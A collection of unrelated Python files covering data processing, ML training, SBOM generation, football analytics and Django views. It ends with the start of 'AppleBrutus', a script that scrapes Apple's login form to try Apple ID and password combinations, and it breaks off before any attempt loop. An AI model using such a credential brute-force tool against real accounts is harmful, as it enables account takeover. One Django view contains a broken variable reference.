os.chdir(directory)
with tarfile.open(TAR_FILE, "w:gz") as tar:
for file in glob.glob('*.bin'):
tar.add(file)
os.chdir(original_cwd)
def check_conversion_tools(do_il=False):
# Check that the conversion tools are available
if do_il:
input_files = six.itervalues(INPUT_FILES)
else:
input_files = (f for f in six.itervalues(INPUT_FILES) if f['type'] != 'il')
for input_file in input_files:
tool = input_file['conversion_tool']
if shutilwhich.which(tool) is None:
error_message = "Failed to find conversion tool: {}".format(tool)
logging.error(error_message)
raise OasisException(error_message)
return True
def cleanup_bin_directory(directory):
"""
Clean the tar and binary files.
"""
for file in chain([TAR_FILE], (f + '.bin' for f in six.iterkeys(INPUT_FILES))):
file_path = os.path.join(directory, file)
if os.path.exists(file_path):
os.remove(file_path)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 17 11:27:35 2020
Compute an average iou between two images.
For each image in train_set, the pairwise iou for rest of images in dataset are computed.
@author: dipu
"""
import numpy as np
import os
import pickle
from multiprocessing import Pool, Value
from collections import defaultdict
import time
from functools import partial
import argparse
import random
class Counter(object):
def __init__(self):
self.val = Value('i', 0)
def add(self, n=1):
with self.val.get_lock():
self.val.value += n
@property
def value(self):
return self.val.value
Channel_img_dir = '../data/25ChannelImages'
split_set_file = '../data/UI_data.p'
rico_split_set = pickle.load(open(split_set_file, 'rb'))
train_uis = rico_split_set['train_uis']
train_uis = [x.replace('.png', '') for x in train_uis]
## Load all the images in memory, into a dictionay
img_dict = defaultdict(dict)
for ii in range(len(train_uis)):
imgA_pth = os.path.join(Channel_img_dir, train_uis[ii] + '.npy' )
imgA = np.load(imgA_pth)
img_dict[train_uis[ii]] = imgA
if ii%1000 == 0:
print('Loaded', ii)
print('\nSuccessfully Loaded all the images!')
def compute_iou(imgA_id, imgB_id):
#counter.add(1)
#imgA_pth = os.path.join(Channel_img_dir, imgA_id + '.npy' )
#imgB_pth = os.path.join(Channel_img_dir, imgB_id + '.npy' )
#imgA = np.load(imgA_pth)
#imgB = np.load(imgB_pth)
imgA = img_dict[imgA_id]
imgB = img_dict[imgB_id]
product = imgA*imgB
inter = np.sum(product,axis=(1,2))
logical_or = imgA + imgB
union = np.sum(logical_or, axis= (1,2))
#n_class_q = (np.sum(imgA, axis= (1,2)) > 0).sum() # number of components in first image
n_class_union = (np.sum(union, axis= (1,2)) > 0).sum()
with np.errstate(divide='ignore', invalid='ignore'):
iou_c = np.true_divide(inter,union)
iou_c[iou_c == np.inf] = 0
iou_c = np.nan_to_num(iou_c)
#iou = np.sum(iou_c)/n_class_q
iou = np.sum(iou_c)/n_class_union ## Fixed !
#if counter.value % 1000 == 0 and counter.value >= 1000:
# print('{}'.format(counter.value))
return imgB_id, iou
#%%
def main(args):
segment = args.segment
train_seg = train_uis[(segment-1)*1000: segment*1000]
print('Starting computing iou values for segment ', args.segment)
tic = time.time()
iou_dict = defaultdict(dict)
#for ii in range(2):
for ii in range(len(train_seg)):
anchor = train_seg[ii]
#counter = Counter()
p = Pool(30)
func = partial(compute_iou, anchor)
results = p.map(func, train_uis)
temp_ids, temp_ious = map(list, zip(*results))
#sort it [may be optional, was done for selecting top 200 images]
temp_ids_s = [y for _,y in sorted(zip(temp_ious,temp_ids), reverse =True)]
temp_ious_s = [x for x,_ in sorted(zip(temp_ious,temp_ids), reverse =True)]
iou_dict[anchor]['ids_g40'] = [x for x,y in zip(temp_ids_s,temp_ious_s) if y>0.4]
iou_dict[anchor]['ious_g40'] = [y for x,y in zip(temp_ids_s,temp_ious_s) if y>0.4]
ids_b2040 = [x for x,y in zip(temp_ids_s,temp_ious_s) if y>0.2 and y<0.4 ]
n_b2040 = min (len(ids_b2040), 200)
iou_dict[anchor]['ids_b40'] = random.sample(ids_b2040, n_b2040)
if ii%1000 == 0:
print("Done", ii)
toc = time.time() - tic
print('Elapsed time: ', toc/3600, ' hrs')
p.close()
save_filename = 'iouValues_segment1000_%s.pkl'%(args.segment)
with open(save_filename, 'wb') as f:
pickle.dump(iou_dict, f)
print('saved to ', save_filename)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--segment', default = 6, type=int, metavar='N',
help='segment of the train_uis')
args = parser.parse_args()
main(args)
|
import os
import sys
import open3d as o3d
import numpy as np
import logging
import torch
import torch.multiprocessing as mp
try:
mp.set_start_method('forkserver') # Reuse process created
except RuntimeError:
pass
import torch.distributed as dist
from config import get_config
from lib.test import test
from lib.mptrain import train
from lib.utils import load_state_with_same_shape, get_torch_device, count_parameters
from lib.dataset import initialize_data_loader
from lib.datasets import load_dataset
from models import load_model, load_wrapper
import MinkowskiEngine as ME
os.environ['CUDA_VISIBLE_DEVICES'] = '4, 7'
use_cuda = torch.cuda.is_available()
data_files = '/data/hdd01/luoly/Minkowski/scan_processed/train/'
voxel_size = 0.05
batch_size = 16
def main():
# loss and network
num_devices = torch.cuda.device_count()
print(
"Testing ",
num_devices,
" GPUs. Total batch size: ",
num_devices * batch_size,
)
world_size = num_devices
mp.spawn(main_worker, nprocs=num_devices, args=(num_devices, world_size))
def main_worker(device, ngpus_per_node, config):
config = get_config()
device = get_torch_device(config.is_cuda)
num_devices = torch.cuda.device_count()
world_size = num_devices
rank = 0 * ngpus_per_node + num_devices - 1
dist.init_process_group(
backend="nccl",
init_method="tcp://localhost:23456",
world_size=world_size,
rank=rank,
)
DatasetClass = load_dataset(data_files)
logging.info('===> Initializing dataloader')
if config.is_train:
train_data_loader = initialize_data_loader(
DatasetClass,
config,
phase=config.train_phase,
num_workers=config.num_workers,
augment_data=True,
shuffle=True,
repeat=True,
batch_size=config.batch_size,
limit_numpoints=config.train_limit_numpoints)
val_data_loader = initialize_data_loader(
DatasetClass,
config,
num_workers=config.num_val_workers,
phase=config.val_phase,
augment_data=False,
shuffle=True,
repeat=False,
batch_size=config.val_batch_size,
limit_numpoints=False)
if train_data_loader.dataset.NUM_IN_CHANNEL is not None:
num_in_channel = train_data_loader.dataset.NUM_IN_CHANNEL
else:
num_in_channel = 3 # RGB color
num_labels = train_data_loader.dataset.NUM_LABELS
else:
test_data_loader = initialize_data_loader(
DatasetClass,
config,
num_workers=config.num_workers,
phase=config.test_phase,
augment_data=False,
shuffle=False,
repeat=False,
batch_size=config.test_batch_size,
limit_numpoints=False)
if test_data_loader.dataset.NUM_IN_CHANNEL is not None:
num_in_channel = test_data_loader.dataset.NUM_IN_CHANNEL
else:
num_in_channel = 3 # RGB color
num_labels = test_data_loader.dataset.NUM_LABELS
logging.info('===> Building model')
NetClass = load_model(config.model)
if config.wrapper_type == 'None':
model = NetClass(num_in_channel, num_labels, config)
logging.info('===> Number of trainable parameters: {}: {}'.format(NetClass.__name__,
count_parameters(model)))
else:
wrapper = load_wrapper(config.wrapper_type)
model = wrapper(NetClass, num_in_channel, num_labels, config)
logging.info('===> Number of trainable parameters: {}: {}'.format(
wrapper.__name__ + NetClass.__name__, count_parameters(model)))
logging.info(model)
torch.cuda.set_device(device)
model = model.to(device)
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[device])
model = ME.MinkowskiSyncBatchNorm.convert_sync_batchnorm(model)
if config.weights == 'modelzoo': # Load modelzoo weights if possible.
logging.info('===> Loading modelzoo weights')
model.preload_modelzoo()
# Load weights if specified by the parameter.
elif config.weights.lower() != 'none':
logging.info('===> Loading weights: ' + config.weights)
state = torch.load(config.weights)
if config.weights_for_inner_model:
model.model.load_state_dict(state['state_dict'])
else:
if config.lenient_weight_loading:
matched_weights = load_state_with_same_shape(
model, state['state_dict'])
model_dict = model.state_dict()
model_dict.update(matched_weights)
model.load_state_dict(model_dict)
else:
model.load_state_dict(state['state_dict'])
if config.is_train:
train(model, train_data_loader, val_data_loader, config)
else:
test(model, test_data_loader, config)
if __name__ == "__main__":
main()
|
import copy
import yaml
# Global constants
N_CHROM = 6
# Set default arguments
# Base config file to use
base_cfg_id = 'H_1-combined'
path_base_cfg = 'config/H_1-combined.yml'
# Pattern for output
pattern_output = 'powerAnalysis/data/simChrom_%s.%s'
# Number of replicates
n_replicates = 10
# Path for output configuration
path_cfg = 'powerAnalysis/powerAnalysis.yml'
# Function definitions
def clean_config(cfg):
'''
Clean configuration dictionary parsed from YAML by stripping newlines and
whitespace.
'''
cfg = copy.copy(cfg)
for k, v in cfg.iteritems():
if type(v) is str:
cfg[k] = v.strip()
elif type(v) is dict:
cfg[k] = clean_config(v)
return(cfg)
def main():
# Load configuration
with open(path_base_cfg, 'rb') as f:
cfg = yaml.load(f)
cfg = clean_config(cfg)
# Change ID for power analysis
cfg['id'] = 'powerAnalysis'
# Change data paths
cfg['data']['chrom_path'] = pattern_output % ('y', 'txt')
cfg['data']['null_path'] = pattern_output % ('null', 'txt')
cfg['data']['regions_path'] = pattern_output % ('regions', 'txt')
cfg['data']['template_path'] = cfg['data']['template_path'].format(
id=base_cfg_id)
cfg['data']['n_chrom'] = n_replicates
# Save revised config
with open(path_cfg, 'wb') as f:
yaml.dump(cfg, f, default_flow_style=False)
if __name__=='__main__':
cfg = main()
|
#!/usr/bin/env python
# encoding: utf-8
# This file is part of CycloneDX Python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
# Copyright (c) OWASP Foundation. All Rights Reserved.
import argparse
import os
import sys
from datetime import datetime
from cyclonedx.model import Tool
from cyclonedx.model.bom import Bom
from cyclonedx.output import BaseOutput, get_instance, OutputFormat, SchemaVersion
from cyclonedx.parser import BaseParser
from .parser.conda import CondaListExplicitParser, CondaListJsonParser
from .parser.environment import EnvironmentParser
from .parser.pipenv import PipEnvParser
from .parser.poetry import PoetryParser
from .parser.requirements import RequirementsParser
class CycloneDxCmdException(Exception):
pass
class CycloneDxCmdNoInputFileSupplied(CycloneDxCmdException):
pass
class CycloneDxCmd:
# Whether debug output is enabled
_DEBUG_ENABLED: bool = False
# Parsed Arguments
_arguments: argparse.Namespace
def __init__(self, args: argparse.Namespace) -> None:
self._arguments = args
if self._arguments.debug_enabled:
self._DEBUG_ENABLED = True
self._debug_message('!!! DEBUG MODE ENABLED !!!')
self._debug_message('Parsed Arguments: {}'.format(self._arguments))
def get_output(self) -> BaseOutput:
try:
parser = self._get_input_parser()
except CycloneDxCmdNoInputFileSupplied as e:
print(f'ERROR: {str(e)}')
exit(1)
except CycloneDxCmdException as e:
print(f'ERROR: {str(e)}')
exit(1)
if parser and parser.has_warnings():
print('')
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('!! Some of your dependencies do not have pinned version !!')
print('!! numbers in your requirements.txt !!')
print('!! !!')
for warning in parser.get_warnings():
print('!! -> {} !!'.format(warning.get_item().ljust(49)))
print('!! !!')
print('!! The above will NOT be included in the generated !!')
print('!! CycloneDX as version is a mandatory field. !!')
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('')
bom = Bom.from_parser(parser=parser)
# Add cyclonedx_bom as a Tool to record it being part of the CycloneDX SBOM generation process
if sys.version_info >= (3, 8, 0):
from importlib.metadata import version as md_version
else:
from importlib_metadata import version as md_version # type: ignore
bom.metadata.add_tool(tool=Tool(
vendor='CycloneDX', name='cyclonedx-bom', version=md_version('cyclonedx-bom')
))
return get_instance(
bom=bom,
output_format=OutputFormat[str(self._arguments.output_format).upper()],
schema_version=SchemaVersion['V{}'.format(
str(self._arguments.output_schema_version).replace('.', '_')
)]
)
def execute(self) -> None:
# Quick check for JSON && SchemaVersion <= 1.1
if str(self._arguments.output_format).upper() == 'JSON' and \
str(self._arguments.output_schema_version) in ['1.0', '1.1']:
self._error_and_exit(
message='CycloneDX schema does not support JSON output in Schema Versions < 1.2',
exit_code=2
)
output = self.get_output()
if self._arguments.output_file == '-' or not self._arguments.output_file:
self._debug_message('Returning SBOM to STDOUT')
print(output.output_as_string())
return
# Check directory writable
output_filename = os.path.realpath(self._arguments.output_file)
self._debug_message('Will be outputting SBOM to file at: {}'.format(output_filename))
output.output_to_file(filename=output_filename, allow_overwrite=self._arguments.output_file_overwrite)
@staticmethod
def get_arg_parser() -> argparse.ArgumentParser:
arg_parser = argparse.ArgumentParser(description='CycloneDX SBOM Generator')
input_group = arg_parser.add_mutually_exclusive_group(required=True)
input_group.add_argument(
'-c', '--conda', action='store_true',
help='Build a SBOM based on the output from `conda list --explicit` or `conda list --explicit --md5`',
dest='input_from_conda_explicit'
)
input_group.add_argument(
'-cj', '--conda-json', action='store_true',
help='Build a SBOM based on the output from `conda list --json`',
dest='input_from_conda_json'
)
input_group.add_argument(
'-e', '--e', '--environment', action='store_true',
help='Build a SBOM based on the packages installed in your current Python environment (default)',
dest='input_from_environment'
)
input_group.add_argument(
'-p', '--p', '--poetry', action='store_true',
help='Build a SBOM based on a Poetry poetry.lock\'s contents. Use with -i to specify absolute path'
'to a `poetry.lock` you wish to use, else we\'ll look for one in the current working directory.',
dest='input_from_poetry'
)
input_group.add_argument(
'-pip', '--pip', action='store_true',
help='Build a SBOM based on a PipEnv Pipfile.lock\'s contents. Use with -i to specify absolute path'
'to a `Pipefile.lock` you wish to use, else we\'ll look for one in the current working directory.',
dest='input_from_pip'
)
input_group.add_argument(
'-r', '--r', '--requirements', action='store_true',
help='Build a SBOM based on a requirements.txt\'s contents. Use with -i to specify absolute path'
'to a `requirements.txt` you wish to use, else we\'ll look for one in the current working directory.',
dest='input_from_requirements'
)
input_method_group = arg_parser.add_argument_group(
title='Input Method',
description='Flags to determine how `cyclonedx-bom` obtains it\'s input'
)
input_method_group.add_argument(
'-i', '--in-file', action='store', metavar='FILE_PATH',
type=argparse.FileType('r'), # FileType does handle '-'
default=None,
help='File to read input from. Use "-" to read from STDIN.', dest='input_source', required=False
)
output_group = arg_parser.add_argument_group(
title='SBOM Output Configuration',
description='Choose the output format and schema version'
)
output_group.add_argument(
'--format', action='store', choices=['json', 'xml'], default='xml',
help='The output format for your SBOM (default: %(default)s)',
dest='output_format'
)
output_group.add_argument(
'--schema-version', action='store', choices=['1.4', '1.3', '1.2', '1.1', '1.0'], default='1.3',
help='The CycloneDX schema version for your SBOM (default: %(default)s)',
dest='output_schema_version'
)
output_group.add_argument(
'-o', '--o', '--output', action='store', metavar='FILE_PATH', default='cyclonedx.xml', required=False,
help='Output file path for your SBOM (set to \'-\' to output to STDOUT)', dest='output_file'
)
output_group.add_argument(
'-F', '--force', action='store_true', dest='output_file_overwrite',
help='If outputting to a file and the stated file already exists, it will be overwritten.'
)
arg_parser.add_argument('-X', action='store_true', help='Enable debug output', dest='debug_enabled')
return arg_parser
def _debug_message(self, message: str) -> None:
if self._DEBUG_ENABLED:
print('[DEBUG] - {} - {}'.format(datetime.now(), message))
@staticmethod
def _error_and_exit(message: str, exit_code: int = 1) -> None:
print('[ERROR] - {} - {}'.format(datetime.now(), message))
exit(exit_code)
def _get_input_parser(self) -> BaseParser:
if self._arguments.input_from_environment:
return EnvironmentParser()
# All other Parsers will require some input - grab it now!
if not self._arguments.input_source:
# Nothing passed via STDIN, and no FILENAME supplied, let's assume a default by input type for ease
current_directory = os.getcwd()
try:
if self._arguments.input_from_conda_explicit:
raise CycloneDxCmdNoInputFileSupplied('When using input from Conda Explicit, you need to pipe input'
'via STDIN')
elif self._arguments.input_from_conda_json:
raise CycloneDxCmdNoInputFileSupplied('When using input from Conda JSON, you need to pipe input'
'via STDIN')
elif self._arguments.input_from_pip:
self._arguments.input_source = open(os.path.join(current_directory, 'Pipfile.lock'), 'r')
elif self._arguments.input_from_poetry:
self._arguments.input_source = open(os.path.join(current_directory, 'poetry.lock'), 'r')
elif self._arguments.input_from_requirements:
self._arguments.input_source = open(os.path.join(current_directory, 'requirements.txt'), 'r')
else:
raise CycloneDxCmdException('Parser type could not be determined.')
except FileNotFoundError as e:
raise CycloneDxCmdNoInputFileSupplied(
f'No input file was supplied and no input was provided on STDIN:\n{str(e)}'
)
input_data_fh = self._arguments.input_source
with input_data_fh:
input_data = input_data_fh.read()
input_data_fh.close()
if self._arguments.input_from_conda_explicit:
return CondaListExplicitParser(conda_data=input_data)
elif self._arguments.input_from_conda_json:
return CondaListJsonParser(conda_data=input_data)
elif self._arguments.input_from_pip:
return PipEnvParser(pipenv_contents=input_data)
elif self._arguments.input_from_poetry:
return PoetryParser(poetry_lock_contents=input_data)
elif self._arguments.input_from_requirements:
return RequirementsParser(requirements_content=input_data)
else:
raise CycloneDxCmdException('Parser type could not be determined.')
def main() -> None:
parser = CycloneDxCmd.get_arg_parser()
args = parser.parse_args()
CycloneDxCmd(args).execute()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 19 2020
@author: Sergio Llana (@SergioMinuto90)
"""
from abc import ABC, abstractmethod
import pandas as pd
from utils import read_json, read_event_data, tracking_data, to_single_playing_direction
from processing import PassingNetworkBuilder
class MetricaPassingNetwork(PassingNetworkBuilder, ABC):
def __init__(self, args):
self.context = getattr(args, "context", None)
self.half = getattr(args, "half", None)
self.plot_type = args.plot_type
self.team_name = args.team_name
self.match_id = args.match_id
self.plot_name = None
self.df_events = None
self.plot_title = None
self.plot_legend = None
self.df_tracking = None
self.num_minutes = None
self.player_position = None
self.pair_pass_value = None
self.pair_pass_count = None
self.player_pass_value = None
self.player_pass_count = None
def read_data(self):
"""
Read Metrica eventing and tracking data of the selected 'match_id', generating two pandas DataFrames.
Data's X coordinate must be reversed in the second period, as we need the same attacking direction in both periods.
"""
data_path = "data/tracking"
# Read both tracking and eventing data
df_events = read_event_data(data_path, self.match_id)
df_events['Minute'] = df_events['Start Time [s]'] / 60.0
df_tracking_home = tracking_data(data_path, self.match_id, "Home")
df_tracking_away = tracking_data(data_path, self.match_id, "Away")
df_tracking_home, df_tracking_away, df_events = to_single_playing_direction(df_tracking_home, df_tracking_away, df_events)
self.df_events = df_events
self.df_tracking = df_tracking_home if self.team_name == "Home" else df_tracking_away
def compute_total_minutes(self):
"""
Compute the maximum number of minutes that are used for the passing network.
The idea is not to have more/less than 11 players in the team because of substitutions or red cards.
As Metrica does not provide an event type for substitutions, tracking data is used to know when the first
player is introduced in the pitch (player number 12), as he would not have NaN in his column anymore.
"""
max_minute = self.df_events["Minute"].max()
first_substitution_player = self.df_tracking.columns[24]
first_substitution_minute = self.df_tracking[~self.df_tracking[first_substitution_player].isna()]["Time [s]"].min()/60.0
first_red_card_minute = self.df_events[(self.df_events["Type"] == "CARD") & (self.df_events["Subtype"] == "RED")]["Minute"].min()
self.num_minutes = min(first_substitution_minute, first_red_card_minute, max_minute)
def set_text_info(self):
"""
Set the plot's name, title and legend information based on the customization chosen with the command line arguments.
"""
# Name of the .PNG in the plots/ folder
self.plot_name = "metrica_match{0}_{1}_{2}".format(self.match_id, self.team_name, self.plot_type)
# Title of the plot
opponent_team = "Away" if self.team_name == "Home" else "Home"
self.plot_title ="{0}'s passing network against {1} (Metrica Sports tracking data)".format(self.team_name, opponent_team)
# Information in the legend
if self.context or self.half:
context_meaning = "Context: "
if self.context and not self.half:
context_meaning += self.context
elif not self.context and self.half:
ball_team = self.team_name if self.half == "own_half" else opponent_team
context_meaning += "ball in {0}'s half".format(ball_team)
else:
ball_team = self.team_name if self.half == "own_half" else opponent_team
context_meaning += "{0}, ball in {1}'s half".format(self.context, ball_team)
context_meaning += "\n"
else:
context_meaning = ""
location_meaning = "players avg. position" if self.plot_type == "tracking" else "pass origin"
self.plot_legend = "{0}Location: {1}\nSize: number of passes\nColor: number of passes".format(context_meaning, location_meaning)
@abstractmethod
def prepare_data(self):
pass
class MetricaBasicPassingNetwork(MetricaPassingNetwork):
def __init__(self, args):
super(MetricaBasicPassingNetwork, self).__init__(args)
def prepare_data(self):
"""
Prepares the five pandas DataFrames that 'draw_pass_map' needs.
"""
# We select all passes done by the selected team before the minute of the first substitution or red card.
df_passes = self.df_events[(self.df_events["Type"] == "PASS") &
(self.df_events["Team"] == self.team_name) &
(self.df_events["Minute"] < self.num_minutes)].copy()
df_passes = df_passes.rename(columns={"Start X": "origin_pos_x", "Start Y": "origin_pos_y"})
# In this type of plot, both the size and color (i.e. value) mean the same: number of passes
self.player_pass_value = df_passes.groupby("From").size().to_frame("pass_value")
self.player_pass_count = df_passes.groupby("From").size().to_frame("num_passes")
# 'pair_key' combines the names of the passer and receiver of each pass (sorted alphabetically)
df_passes["pair_key"] = df_passes.apply(lambda x: "_".join(sorted([x["From"], x["To"]])), axis=1)
self.pair_pass_value = df_passes.groupby("pair_key").size().to_frame("pass_value")
self.pair_pass_count = df_passes.groupby("pair_key").size().to_frame("num_passes")
# Average pass origin's coordinates for each player
self.player_position = df_passes.groupby("From").agg({"origin_pos_x": "median", "origin_pos_y": "median"})
class MetricaTrackingPassingNetwork(MetricaPassingNetwork):
def __init__(self, args):
super(MetricaTrackingPassingNetwork, self).__init__(args)
def _context_frames(self):
"""
Basic algorithm to detect ball possession changes.
Note that frames out of effective playing time are not considered.
Returns
-----------
on_ball_frames: set of frames when the selected team was in possession of the ball (i.e. attacking).
off_ball_frames: set of frames when the selected team had not the possession (i.e. defending).
"""
df_events_simple = self.df_events[~self.df_events.Type.isin(["CHALLENGE", "CARD"])].reset_index(drop=True)
possession_start_events = ['PASS', 'RECOVERY', 'SET PIECE', 'SHOT']
possession_change_events = ["BALL LOST", "BALL OUT"]
current_window_start = self.df_events[self.df_events["Subtype"] == "KICK OFF"].iloc[0]["Start Frame"]
on_ball_frames = set()
off_ball_frames = set()
for event_index, row in df_events_simple.iterrows():
event_type = row["Type"]
if event_type in possession_change_events:
current_window_end = row["Start Frame"] if event_type == "BALL OUT" else row["End Frame"]
next_starts = df_events_simple[(df_events_simple.index > event_index) &
(df_events_simple.index <= event_index + 10) &
(df_events_simple["Type"].isin(possession_start_events))]
if next_starts.shape[0] > 0:
next_start = next_starts.iloc[0]
frames_set = on_ball_frames if row["Team"] == self.team_name else off_ball_frames
frames_set.update(range(current_window_start, current_window_end))
current_window_start = next_start["Start Frame"]
return on_ball_frames, off_ball_frames
def prepare_data(self):
"""
Prepares the five pandas DataFrames that 'draw_pass_map' needs.
"""
df_passes = self.df_events[(self.df_events["Type"] == "PASS") &
(self.df_events["Team"] == self.team_name) &
(self.df_events["Minute"] < self.num_minutes)].copy()
df_passes = df_passes.rename(columns={"Start X": "origin_pos_x", "Start Y": "origin_pos_y"})
# In this type of plot, both the size and color (i.e. value) mean the same: number of passes
self.player_pass_value = df_passes.groupby("From").size().to_frame("pass_value")
self.player_pass_count = df_passes.groupby("From").size().to_frame("num_passes")
# 'pair_key' combines the names of the passer and receiver of each pass (sorted alphabetically)
df_passes["pair_key"] = df_passes.apply(lambda x: "_".join(sorted([x["From"], x["To"]])), axis=1)
self.pair_pass_value = df_passes.groupby("pair_key").size().to_frame("pass_value")
self.pair_pass_count = df_passes.groupby("pair_key").size().to_frame("num_passes")
# In this type of plot, instead of averaging the location of the pass origins, we use tracking data
# to compute player's average location
df_tracking = self.df_tracking[(self.df_tracking.index < df_passes["End Frame"].max())]
x_columns = [col for col in df_tracking.columns if col.endswith("_x") and col != "ball_x"]
y_columns = [col for col in df_tracking.columns if col.endswith("_y") and col != "ball_y"]
# Different filters are applied depending on the customization chosen in the command line arguments
if self.context == "attacking":
frames, _ = self._context_frames()
df_tracking = df_tracking[df_tracking.index.isin(frames)]
self.plot_name = "{0}_{1}".format(self.plot_name, self.context)
elif self.context == "defending":
_, frames = self._context_frames()
df_tracking = df_tracking[df_tracking.index.isin(frames)]
self.plot_name = "{0}_{1}".format(self.plot_name, self.context)
if self.half:
match_start = self.df_events[self.df_events["Subtype"] == "KICK OFF"].iloc[0]["Start Frame"]
mean_x = self.df_tracking.loc[self.df_tracking.index == match_start, x_columns].mean().mean()
if self.half == "own_half":
if mean_x < 0.5:
df_tracking = df_tracking[df_tracking["ball_x"] < 0.5]
else:
df_tracking = df_tracking[df_tracking["ball_x"] >= 0.5]
self.plot_name = "{0}_{1}".format(self.plot_name, self.half)
else:
if mean_x < 0.5:
df_tracking = df_tracking[df_tracking["ball_x"] >= 0.5]
else:
df_tracking = df_tracking[df_tracking["ball_x"] < 0.5]
self.plot_name = "{0}_{1}".format(self.plot_name, self.half)
df_pos_x = pd.melt(df_tracking, id_vars=[], value_vars=x_columns)
df_pos_x["player"] = df_pos_x.variable.apply(lambda x: x[:-2])
df_pos_x = df_pos_x.groupby("player").agg({"value": "median"})
df_pos_x = df_pos_x.rename(columns={"value": "origin_pos_x"})
df_pos_y = pd.melt(df_tracking, id_vars=[], value_vars=y_columns)
df_pos_y["player"] = df_pos_y.variable.apply(lambda x: x[:-2])
df_pos_y = df_pos_y.groupby("player").agg({"value": "median"})
df_pos_y = df_pos_y.rename(columns={"value": "origin_pos_y"})
player_position = df_pos_x.merge(df_pos_y, left_index=True, right_index=True)
player_position.index = player_position.index.map(lambda x: "Player{0}".format(x.split("_")[-1]))
self.player_position = player_position |
'''
/django_api/pitch/views.py
-------------------------
Organize the views of pitch
'''
import json
from django.http import JsonResponse
from django_api.world_week.pitch.models import Pitch
def all_scores(request):
if request.method == 'GET':
all_pitchs = list(Pitch.objects.all())
scores = []
for i in all_pitchs:
tmp = {}
tmp['id'] = i.id
tmp['name'] = i.name
tmp['isPart'] = i.isPart
tmp['isFini'] = i.isFini
tmp['isFreeze'] = i.isFreeze
tmp['number'] = i.number
tmp['number_2'] = i.number_2
tmp['number_3'] = i.number_3
tmp['number_4'] = i.number_4
tmp['number_5'] = i.number_5
tmp['number_6'] = i.number_6
tmp['time'] = i.time
tmp['p_score'] = i.p_score
tmp['comment'] = i.comment
scores.append(tmp)
if len(all_pitchs) >= 0:
return JsonResponse({
'code': 200,
'msg': 'get all information successfully',
'data': {
'total': len(scores),
'infos': scores
}
})
else:
return JsonResponse({'code': 200, 'msg': 'Empty table!'})
def one_score(request):
if request.method == 'GET':
id = request.GET.get('id',default=0)
name = request.GET.get('name',default='')
if id != 0:
Pitch.objects.filter(id=id)[0]
elif name != '':
pitch_1 = Pitch.objects.filter(name=name)[0]
else:
return JsonResponse({
'code': 3005,
'msg': 'Parameters does not meet the requirements!'
})
info = {'id': pitch_1.id, 'name': pitch_1.name, 'isFini': pitch_1.isFini,
'isPart': pitch_1.isPart, 'isFreeze': pitch_1.isFreeze, 'number': pitch_1.number, 'number_2': pitch_1.number_2,
'number_3': pitch_1.number_3, 'number_4': pitch_1.number_4, 'number_5': pitch_1.number_5, 'number_6': pitch_1.number_6,
'p_score': pitch_1.p_score, 'time': pitch_1.time, 'comment': pitch_1.comment}
return JsonResponse({
'code': 200,
'msg': 'Get information successfully',
'data': {
'info': info
}
})
def add_score(request):
if request.method == 'POST':
received_json_data = json.loads(request.body)
rec = received_json_data
pitch_1 = Pitch(name=rec['name'], isPart=rec['isPart'], isFini=rec['isFini'], isFreeze=rec['isFreeze'],
number=rec['number'], number_2 = rec['number_2'], number_3 = rec['number_3']
,number_4 = rec['number_4'], number_5 = rec['number_5'], number_6 = rec['number_6'],
time=rec['time'], p_score=rec['p_score'], comment=rec['comment'])
pitch_1.save()
return JsonResponse({
'code': 200,
'msg': 'Add Successfully!',
'data':{
'name': rec['name']
}
})
def update_score(request):
if request.method == 'PUT':
received_json_data = json.loads(request.body)
rec = received_json_data
pitch_1 = Pitch.objects.get(id = rec['id'])
pitch_1.name=rec['name']
pitch_1.isPart=rec['isPart']
pitch_1.isFini=rec['isFini']
pitch_1.isFreeze=rec['isFreeze']
pitch_1.number=rec['number']
pitch_1.number_2 = rec['number_2']
pitch_1.number_3 = rec['number_3']
pitch_1.number_4 = rec['number_4']
pitch_1.number_5 = rec['number_5']
pitch_1.number_6 = rec['number_6']
pitch_1.time=rec['time']
pitch_1.p_score=rec['p_score']
pitch_1.comment=rec['comment']
pitch_1.save()
return JsonResponse({
'code': 200,
'msg': 'Update Successfully!',
'data':{
'name': rec['name']
}
})
else:
return JsonResponse({
'code': 500,
'msg': 'Update Failed, incorrect request method!'
})
def p_score_delete_byId(request):
try:
id = request.GET.get('id')
except:
pass
if id:
print(id)
Pitch.objects.filter(id=id).delete()
return JsonResponse({
'code': 200,
'msg': 'Delete successfully!',
})
else:
return JsonResponse({
'code': 404,
'msg': 'Delete failed!'
}) |
#!/usr/bin/env python3
# Written by Sem Voigtlander (@userlandkernel)
# Licensed under the MIT License
# Apple if you are monitoring this, please add anti-bot verification to your identity service provider (eg: captcha!)
import os
import sys
import argparse
import requests
import time
import datetime
from bs4 import BeautifulSoup as Soup
class AppleBrutus:
def __init__(self):
self.tstart = datetime.datetime.now()
# Session to keep cookies etc
self.s = requests.Session()
# Identity Service provider
self.ids = "https://idmsa.apple.com/IDMSWebAuth/login?appIdKey=bbddf091a7ff4178d2deda57c73e701096e4cd4b7f97545ed8703b3c46f38461&baseURL=https://portal.apple.com/&path=validateUser%3Faction%3Dlogin%26appId%3D1468%26requestUri"
def attempt(self, environ="PROD", appleid=None, password=None):
# Retrieve the login page content
loginpage = self.s.get(self.ids, allow_redirects=True)
# If the status isn't HTTP_OK something must be wrong with the application
if loginpage.status_code != 200:
raise BaseException("Login page returned error")
# Find the login
soup = Soup(loginpage.text, "html.parser")
form = soup.find("form", {"name":"form2"}) # Login form is named form2
# Automatically retrieve fields and set post data for requests
formdata = dict()
for element in form.find_all("input"):
try:
formdata[element["name"]] = element["value"]
except Exception as exc:
pass
# Set the username and password
if not appleid:
